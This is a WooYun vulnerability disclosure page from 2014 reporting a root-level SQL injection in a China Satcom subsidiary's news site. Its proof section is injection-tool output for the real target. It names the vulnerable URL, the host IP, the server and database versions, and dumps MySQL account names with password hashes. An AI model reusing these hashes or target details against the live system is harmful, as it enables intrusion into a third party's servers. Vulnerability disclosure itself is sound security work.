当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-051040

漏洞标题:中国卫通旗下航天数字传媒存在root权限的注射漏洞

相关厂商:中国卫通

漏洞作者: 雅柏菲卡

提交时间:2014-02-21 16:53

修复时间:2014-04-07 16:55

公开时间:2014-04-07 16:55

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-02-21: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-04-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

........

详细说明:

.......

漏洞证明:

Target: 		http://www.chinadbstar.com.cn/news/infodetail.jsp?id=1388359954707
Host IP: 114.242.176.194
Web Server: Apache-Coyote/1.1
DB Server: MySQL >=5
Resp. Time(avg): 1178 ms
Current User: dbstaradmin@localhost
Installation dir: /usr/
Host Name: websvr.chinadbstar.com.cn
Sql Version: 5.0.77
System User: dbstaradmin@localhost
Current DB: db_starchina
Compile OS: redhat-linux-gnu
DB User & Pass: root:28ada40514328878:localhost
root:28ada40514328878:websvr.chinadbstar.com.cn
root:28ada40514328878:127.0.0.1
::websvr.chinadbstar.com.cn
root:28ada40514328878:%
dbstaradmin:3ed90dc722666d3d:%
dbstaradmin:3ed90dc722666d3d:127.0.0.1
dbstaradmin:3ed90dc722666d3d:localhost
dbstaradmin:3ed90dc722666d3d:websvr.chinadbstar.com.cn
Data Bases: information_schema
db_starchina
mysql
test
具体的表就不解了

修复方案:

版权声明:转载请注明来源 雅柏菲卡@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝